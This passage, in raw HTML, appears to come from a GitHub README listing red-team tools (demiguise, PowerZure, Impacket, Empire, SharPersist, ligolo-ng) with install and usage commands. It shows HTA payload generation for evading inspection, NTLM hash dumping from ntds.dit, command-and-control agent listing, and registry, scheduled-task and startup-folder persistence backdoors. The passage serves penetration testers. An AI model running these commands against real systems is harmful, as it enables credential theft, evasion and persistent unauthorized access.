1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe aim of this project is to generate .html files that contain an encrypted HTA file.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis is an evasion technique to get round content / file-type inspection implemented by some security-appliances.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFurther technical information \u003ca href=\"https://github.com/nccgroup/demiguise#how-does-it-do-it\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/nccgroup/demiguise\ncd demiguise\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/nccgroup/demiguise\ncd demiguise\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Generate an encrypted .hta file that executes notepad.exe\npython demiguise.py -k hello -c \u0026quot;notepad.exe\u0026quot; -p Outlook.Application -o test.hta\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate an encrypted .hta file that executes notepad.exe\u003c/span\u003e\npython demiguise.py -k hello -c \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003enotepad.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -p Outlook.Application -o test.hta\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/nccgroup/demiguise\"\u003ehttps://github.com/nccgroup/demiguise\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch2 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/hausec/PowerZure\"\u003ePowerZure\u003c/a\u003e\u003c/h2\u003e\u003ca id=\"user-content-powerzure\" class=\"anchor\" aria-label=\"Permalink: 🔙PowerZure\" href=\"#powerzure\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure, meaning you can safely use PowerZure to interact with a victim’s cloud instance from your operating machine.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Install-Module -Name Az\ngit clone https://github.com/hausec/PowerZure\ncd PowerZure\nipmo C:\\path\\to\\PowerZure.psd1\"\u003e\u003cpre\u003eInstall-Module -Name Az\ngit clone https://github.com/hausec/PowerZure\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e PowerZure\nipmo C:\u003cspan class=\"pl-cce\"\u003e\\p\u003c/span\u003eath\u003cspan class=\"pl-cce\"\u003e\\t\u003c/span\u003eo\u003cspan class=\"pl-cce\"\u003e\\P\u003c/span\u003eowerZure.psd1\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Get a list of AzureAD and Azure objects you have access to\nGet-AzureTarget\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get a list of AzureAD and Azure objects you have access to\u003c/span\u003e\nGet-AzureTarget\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a\" rel=\"nofollow\"\u003eBlog - Attacking Azure, Azure AD, and Introducing PowerZure\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://hakin9.org\" rel=\"nofollow\"\u003ehttps://hakin9.org\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003ePersistence\u003c/h1\u003e\u003ca id=\"user-content-persistence\" class=\"anchor\" aria-label=\"Permalink: Persistence\" href=\"#persistence\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/fortra/impacket\"\u003eImpacket\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-impacket\" class=\"anchor\" aria-label=\"Permalink: 🔙Impacket\" href=\"#impacket\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eImpacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 -m pip install impacket\"\u003e\u003cpre\u003epython3 -m pip install impacket\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (With Example Scripts)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDownload and extract \u003ca href=\"https://github.com/fortra/impacket\"\u003ethe package\u003c/a\u003e, then navigate to the install folder and run...\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 -m pip install .\"\u003e\u003cpre\u003epython3 -m pip install \u003cspan class=\"pl-c1\"\u003e.\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Extract NTLM hashes with local files\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n# Gets a list of the sessions opened at the remote hosts\nnetview.py domain/user:password -target 192.168.10.2\n\n# Retrieves the MSSQL instances names from the target host.\nmssqlinstance.py 192.168.1.2\n\n# This script will gather data about the domain's users and their corresponding email addresses.\nGetADUsers.py domain/user:password@IP\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Extract NTLM hashes with local files\u003c/span\u003e\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Gets a list of the sessions opened at the remote hosts\u003c/span\u003e\nnetview.py domain/user:password -target 192.168.10.2\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Retrieves the MSSQL instances names from the target host.\u003c/span\u003e\nmssqlinstance.py 192.168.1.2\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e This script will gather data about the domain's users and their corresponding email addresses.\u003c/span\u003e\nGetADUsers.py domain/user:password@IP\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGreat \u003ca href=\"https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/\" rel=\"nofollow\"\u003echeat sheet\u003c/a\u003e for Impacket usage.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/EmpireProject/Empire\"\u003eEmpire\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-empire\" class=\"anchor\" aria-label=\"Permalink: 🔙Empire\" href=\"#empire\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eEmpire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOnce a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eEmpire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/EmpireProject/Empire\ncd Empire\nsudo ./setup/install.sh\"\u003e\u003cpre\u003egit clone https://github.com/EmpireProject/Empire\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Empire\nsudo ./setup/install.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Start Empire\n./empire\n\n# List live agents\nlist agents\n\n# List live listeners\nlist listeners\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Start Empire\u003c/span\u003e\n./empire\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List live agents\u003c/span\u003e\nlist agents\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List live listeners\u003c/span\u003e\nlist listeners\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice usage \u003ca href=\"https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf\"\u003echeat sheet\u003c/a\u003e by \u003ca href=\"https://github.com/HarmJ0y\"\u003eHarmJoy\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/mandiant/SharPersist\"\u003eSharPersist\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sharpersist\" class=\"anchor\" aria-label=\"Permalink: 🔙SharPersist\" href=\"#sharpersist\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA Windows persistence toolkit written in C#.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe project has a \u003ca href=\"https://github.com/mandiant/SharPersist/wiki\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can find the most recent release \u003ca href=\"https://github.com/mandiant/SharPersist/releases\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eDownload the project files from the \u003ca href=\"https://github.com/mandiant/SharPersist\"\u003eGitHub Repo\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLoad the Visual Studio project up and go to \"Tools\" --\u0026gt; \"NuGet Package Manager\" --\u0026gt; \"Package Manager Settings\"\u003c/li\u003e\n\u003cli\u003eGo to \"NuGet Package Manager\" --\u0026gt; \"Package Sources\"\u003c/li\u003e\n\u003cli\u003eAdd a package source with the URL \"\u003ca href=\"https://api.nuget.org/v3/index.json\" rel=\"nofollow\"\u003ehttps://api.nuget.org/v3/index.json\u003c/a\u003e\"\u003c/li\u003e\n\u003cli\u003eInstall the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ccode\u003eInstall-Package Costura.Fody -Version 3.3.3\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eInstall the TaskScheduler package\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ccode\u003eInstall-Package TaskScheduler -Version 2.8.11\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eYou can now build the project yourself!\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eA full list of usage examples can be found \u003ca href=\"https://github.com/mandiant/SharPersist#adding-persistence-triggers-add\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"#KeePass\nSharPersist -t keepass -c \u0026quot;C:\\Windows\\System32\\cmd.exe\u0026quot; -a \u0026quot;/c calc.exe\u0026quot; -f \u0026quot;C:\\Users\\username\\AppData\\Roaming\\KeePass\\KeePass.config.xml\u0026quot; -m add \n\n#Registry\nSharPersist -t reg -c \u0026quot;C:\\Windows\\System32\\cmd.exe\u0026quot; -a \u0026quot;/c calc.exe\u0026quot; -k \u0026quot;hkcurun\u0026quot; -v \u0026quot;Test Stuff\u0026quot; -m add\n\n#Scheduled Task Backdoor\nSharPersist -t schtaskbackdoor -c \u0026quot;C:\\Windows\\System32\\cmd.exe\u0026quot; -a \u0026quot;/c calc.exe\u0026quot; -n \u0026quot;Something Cool\u0026quot; -m add\n\n#Startup Folder\nSharPersist -t startupfolder -c \u0026quot;C:\\Windows\\System32\\cmd.exe\u0026quot; -a \u0026quot;/c calc.exe\u0026quot; -f \u0026quot;Some File\u0026quot; -m add\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e#KeePass\nSharPersist -t keepass -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"C:\\Users\\username\\AppData\\Roaming\\KeePass\\KeePass.config.xml\" -m add \n\n#Registry\nSharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"hkcurun\" -v \"Test Stuff\" -m add\n\n#Scheduled Task Backdoor\nSharPersist -t schtaskbackdoor -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -n \"Something Cool\" -m add\n\n#Startup Folder\nSharPersist -t startupfolder -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"Some File\" -m add\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/nicocha30/ligolo-ng\"\u003eligolo-ng\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-ligolo-ng\" class=\"anchor\" aria-label=\"Permalink: 🔙ligolo-ng\" href=\"#ligolo-ng\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLigolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eInstead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using \u003ca href=\"https://gvisor.dev/\" rel=\"nofollow\"\u003eGvisor\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eWhen running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Download)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003ePrecompiled binaries (Windows/Linux/macOS) are available on the \u003ca href=\"https://github.com/nicocha30/ligolo-ng/releases\"\u003eRelease page\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Build)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eBuilding ligolo-ng (Go \u0026gt;= 1.17 is required):\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go build -o agent cmd/agent/main.go\ngo build -o proxy cmd/proxy/main.go\n\n# Build for Windows\nGOOS=windows go build -o agent.exe cmd/agent/main.go\nGOOS=windows go build -o proxy.exe cmd/proxy/main.go\"\u003e\u003cpre\u003ego build -o agent cmd/agent/main.go\ngo build -o proxy cmd/proxy/main.go\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Build for Windows\u003c/span\u003e\nGOOS=windows go build -o agent.exe cmd/agent/main.go\nGOOS=windows go build -o proxy.exe cmd/proxy/main.go\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSetup: (Linux)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo ip tuntap add user [your_username] mode tun ligolo\nsudo ip link set ligolo up\"\u003e\u003cpre\u003esudo ip tuntap add user [your_username] mode tun ligolo\nsudo ip link \u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e ligolo up\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSetup: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou need to download the \u003ca href=\"https://www.wintun.net/\" rel=\"nofollow\"\u003eWintun\u003c/a\u003e driver (used by \u003ca href=\"https://www.wireguard.com/\" rel=\"nofollow\"\u003eWireGuard\u003c/a\u003e) and place the \u003ccode\u003ewintun.dll\u003c/code\u003e in the same folder as Ligolo (make sure you use the right architecture).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSetup: (Proxy server)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./proxy -h # Help options\n./proxy -autocert # Automatically request LetsEncrypt certificates\"\u003e\u003cpre\u003e./proxy -h \u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Help options\u003c/span\u003e\n./proxy -autocert \u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Automatically request LetsEncrypt certificates\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eStart the agent on your target (victim) computer (no privileges are required!):\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative 